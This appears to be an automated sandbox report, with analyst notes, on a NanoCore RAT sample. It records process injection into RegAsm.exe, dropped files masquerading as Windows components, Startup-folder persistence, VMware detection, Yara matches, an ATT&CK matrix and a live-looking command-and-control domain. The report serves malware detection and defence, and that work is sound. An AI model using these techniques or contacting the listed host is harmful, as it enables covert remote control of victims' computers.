Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnk
Note: the shortcut in the per-user Startup folder is the persistence observed in this run; this section does not show the shortcut's target. Both dropped names are borrowed from legitimate Windows components (DiagnosticsHub.StandardCollector.Service, WinSAT), and dhcpmon.exe lives in a vendor-style directory that is not a Windows location, so none of these paths should be matched by name alone; the RegAsm.pdb string in dhcpmon.exe and the .bat's PE content are the reliable handles.

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe:Zone.Identifier (access: read attributes | delete)
Note: the stream touched is the Zone.Identifier of RegAsm.exe itself, the Microsoft-signed binary hosting the injected payload, not of the sample or of the dropped files; the DELETE bit in the requested access is what triggers this signature. Taken alone it is weak evidence of mark-of-the-web removal; the dropped copies and the Startup shortcut above are the stronger indicators of what this sample hides and how it persists.
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function 2_2_003C4A35: GetForegroundWindow, FindWindowW, IsIconic, ShowWindow, SetForegroundWindow, GetWindowThreadProcessId, GetWindowThreadProcessId, GetCurrentThreadId, GetWindowThreadProcessId, AttachThreadInput, AttachThreadInput, AttachThreadInput, AttachThreadInput, SetForegroundWindow, MapVirtualKeyW, MapVirtualKeyW, keybd_event, keybd_event, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, SetForegroundWindow, AttachThreadInput, AttachThreadInput, AttachThreadInput, AttachThreadInput (window activation with synthesized keystrokes: the thread attaches its input queue to the target window's thread so SetForegroundWindow and keybd_event are honoured)
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function 2_2_004455FD: IsWindowVisible, IsWindowEnabled, GetForegroundWindow, IsIconic, IsZoomed
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function 2_2_003E33C7: RtlEncodePointer, GetModuleHandleW, followed by a run of GetProcAddress calls (runtime resolution of a table of imports)
Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process information set: NOOPENFILEERRORBOX (40 occurrences)
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process information set: NOOPENFILEERRORBOX (23 occurrences)
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Process information set: NOOPENFILEERRORBOX (13 occurrences)
Note: SetErrorMode(SEM_NOOPENFILEERRORBOX) suppresses the "file not found" dialog that a failed library load would otherwise raise; the CLR and most runtimes set it routinely, so the count above reflects library-loading activity, not a technique specific to this sample.
Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Note: the device interface path names the VMware virtual CD-ROM (vendor NECVMWar, product VMware_SATA_CD00); enumerating it is how the first stage can learn that it runs under VMware.
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Thread delayed: delay time: 922337203685477
Note: 922337203685477 ms is Int64.MaxValue ticks divided by 10,000, i.e. TimeSpan.MaxValue expressed in milliseconds. That is what a .NET wait with no timeout looks like in this telemetry, so these entries are blocking waits, not timed sandbox-evasion sleeps.
Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe | Window / User API: threadDelayed 7081
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Window / User API: threadDelayed 994
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Window / User API: threadDelayed 642
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Window / User API: foregroundWindowGot 813 (repeated GetForegroundWindow polling, a user-activity check)
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Window / User API: threadDelayed 502
Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe TID: 2412 | Thread sleep count: 7081 > 30
Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe TID: 2412 | Thread sleep time: -70810s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5892 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5888 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat TID: 5072 | Thread sleep count: 502 > 30
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5332 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 2428 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe | Last function: Thread delayed (2 occurrences)
Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe | Thread sleep count: Count: 7081 delay: -10
Note: the "s" suffix on these raw values is misleading. 7081 sleeps of 10 units in TID 2412 add up exactly to the reported 70810, so the unit is milliseconds: about 71 s of 10 ms polling in the first stage, 180 s in RegAsm.exe TID 5888. TID 5892's figure is exactly twice 922337203685477, two untimed waits summed. The only stalling worth the name here is the first stage's polling loop; the rest is the payload blocking on wait handles.
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00424696 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00424696
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00423D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00423D4E
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_004245C1 FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,2_2_004245C1
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042C93C FindFirstFileW,FindClose,2_2_0042C93C
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,2_2_0042C9C7
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0042F200
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0042F35D
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042F65E FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_0042F65E
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00423A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00423A2B
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042BF27 FindFirstFileW,FindNextFileW,FindClose,2_2_0042BF27
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003C4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_003C4AFE
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_004341FD BlockInput,2_2_004341FD
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003C3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,2_2_003C3B4C
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003F5CCC EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_003F5CCC
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0043C304 LoadLibraryA,GetProcAddress,2_2_0043C304
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeCode function: 0_3_038D00BE mov esi, dword ptr fs:[00000030h]0_3_038D00BE
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeCode function: 0_3_038D00BE mov esi, dword ptr fs:[00000030h]0_3_038D00BE
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_3_00E300BE mov esi, dword ptr fs:[00000030h]2_3_00E300BE
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_3_00E300BE mov esi, dword ptr fs:[00000030h]2_3_00E300BE
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_004181F7 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_004181F7
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003EA364 SetUnhandledExceptionFilter,2_2_003EA364
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003EA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_003EA395
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion:

        Allocates memory in foreign processes
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000 protect: page execute and read and write
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000 protect: page execute and read and write
        Contains functionality to inject code into remote processes
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe | Code function: 0_3_038D00BE CreateProcessW, GetThreadContext, ReadProcessMemory, VirtualAlloc, VirtualAllocEx, WriteProcessMemory, VirtualProtectEx, VirtualProtectEx, VirtualFree, WriteProcessMemory, SetThreadContext, ResumeThread
        Injects a PE file into a foreign process
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000 value starts with: 4D5A
        Writes to foreign memory regions
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 88B008
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 11FD008
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_00418C93 LogonUserW
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003C3B4C GetCurrentDirectoryW, IsDebuggerPresent, GetFullPathNameW, KiUserCallbackDispatcher, SetCurrentDirectoryW, MessageBoxA, SetCurrentDirectoryW, GetForegroundWindow, ShellExecuteW
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003C4A35 GetForegroundWindow, FindWindowW, IsIconic, ShowWindow, SetForegroundWindow, GetWindowThreadProcessId, GetWindowThreadProcessId, GetCurrentThreadId, GetWindowThreadProcessId, AttachThreadInput, AttachThreadInput, AttachThreadInput, AttachThreadInput, SetForegroundWindow, MapVirtualKeyW, MapVirtualKeyW, keybd_event, keybd_event, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, SetForegroundWindow, AttachThreadInput, AttachThreadInput, AttachThreadInput, AttachThreadInput
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_00424EC9 mouse_event
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_004181F7 GetSecurityDescriptorDacl, GetAclInformation, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_00424C03 AllocateAndInitializeSid, CheckTokenMembership, FreeSid
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat | Binary or memory string: Shell_TrayWnd
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003E886B cpuid
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003F50D7 GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_00402230 GetUserNameW
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003F418A _strlen, _strlen, GetTimeZoneInformation, WideCharToMultiByte, WideCharToMultiByte
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_003C4AFE GetVersionExW, GetCurrentProcess, IsWow64Process, GetNativeSystemInfo, FreeLibrary, GetSystemInfo, GetSystemInfo
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        Yara detected Nanocore RAT
        Source: Yara match | File source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000003.209839006.00000000010BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000003.254683276.0000000001181000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000003.209991404.00000000010E7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000003.209808084.0000000001147000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000003.209532145.0000000001114000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000003.231856687.000000000112F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000003.230915051.0000000001129000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000003.231281467.0000000001180000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000003.230856862.00000000011B4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000003.254526561.00000000011E6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000003.254613953.00000000011B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000003.254797061.0000000000F9F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000003.231188805.0000000001154000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.250629843.0000000004451000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000003.210637735.000000000106B000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000003.232736755.0000000000E62000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000003.231305365.0000000001181000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000003.231549555.00000000010FD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.250595233.0000000003451000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000003.210116902.00000000010E7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000003.210229940.0000000001114000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000003.231711637.00000000010FD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 5944, type: MEMORY
        Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4332, type: MEMORY
        Source: Yara match | File source: Process Memory Space: d4e475d7d17a16be8b9eeac6e10b25af.exe PID: 576, type: MEMORY
        Source: Yara match | File source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, type: UNPACKEDPE
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat | Binary or memory string: WIN_81
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat | Binary or memory string: WIN_XP
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat | Binary or memory string: WIN_XPe
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat | Binary or memory string: WIN_VISTA
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat | Binary or memory string: WIN_7
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat | Binary or memory string: WIN_8
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

        Remote Access Functionality:

        Detected Nanocore Rat
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exe, 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat, 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
        Source: RegAsm.exe, 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
        Source: RegAsm.exe, 00000003.00000002.250629843.0000000004451000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Yara detected Nanocore RAT
        Source: Yara match | File sources: the same memory dumps, process memory spaces and unpacked PE files listed under Stealing of Sensitive Information above
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_00436596 socket, WSAGetLastError, bind, listen, WSAGetLastError, closesocket
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 2_2_00436A5A socket, WSAGetLastError, bind, WSAGetLastError, closesocket

        Mitre Att&ck Matrix

        Techniques listed per tactic column of the matrix; digits after a technique name are the report's count badges, reproduced as they appear.

        Initial Access: Valid Accounts (2), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise, Compromise Software Dependencies and Development Tools
        Execution: Native API (1), Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell, AppleScript, Windows Command Shell
        Persistence: Startup Items (1), DLL Side-Loading (1), Application Shimming (1), Valid Accounts (2), Registry Run Keys / Startup Folder (2), Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows), Cron
        Privilege Escalation: Startup Items (1), Exploitation for Privilege Escalation (1), DLL Side-Loading (1), Application Shimming (1), Valid Accounts (2), Access Token Manipulation (21), Process Injection (412), Registry Run Keys / Startup Folder (2), At (Linux), At (Windows), Cron
        Defense Evasion: Disable or Modify Tools (11), Deobfuscate/Decode Files or Information (11), Obfuscated Files or Information (2), Software Packing (11), DLL Side-Loading (1), Masquerading (12), Valid Accounts (2), Virtualization/Sandbox Evasion (4), Access Token Manipulation (21), Process Injection (412), Hidden Files and Directories (1)
        Credential Access: Input Capture (31), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing, Input Capture
        Discovery: System Time Discovery (2), Account Discovery (1), File and Directory Discovery (2), System Information Discovery (26), Security Software Discovery (4), Virtualization/Sandbox Evasion (4), Process Discovery (3), Application Window Discovery (11), System Owner/User Discovery (1), Process Discovery, Permission Groups Discovery
        Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools, Taint Shared Content, Replication Through Removable Media
        Collection: Archive Collected Data (11), Input Capture (31), Clipboard Data (2), Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging, Remote Data Staging
        Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Exfiltration Over Physical Medium
        Command and Control: Ingress Tool Transfer (1), Encrypted Channel (1), Remote Access Software (1), Non-Application Layer Protocol (1), Application Layer Protocol (11), Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols, Mail Protocols
        Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
        Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
        Impact: System Shutdown/Reboot (1), Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction, Data Encrypted for Impact, Service Stop

        Behavior Graph

        Behavior Graph ID: 320928, Sample: d4e475d7d17a16be8b9eeac6e10b25af, Start date: 20/11/2020, Architecture: WINDOWS, Score: 100
        • Start node: DNS name windowslivesoffice.ddns.net; signatures: Found malware configuration, Malicious sample detected (through community Yara rule), Antivirus / Scanner detection for submitted sample, 8 other signatures; started processes: d4e475d7d17a16be8b9eeac6e10b25af.exe, DiagnosticsHub.StandardCollector.Service.exe.bat, dhcpmon.exe
